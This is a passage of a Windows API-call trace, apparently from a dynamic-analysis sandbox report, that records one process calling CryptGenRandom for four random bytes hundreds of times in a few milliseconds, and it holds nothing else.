pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.130] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.131] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.132] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.133] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.134] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | 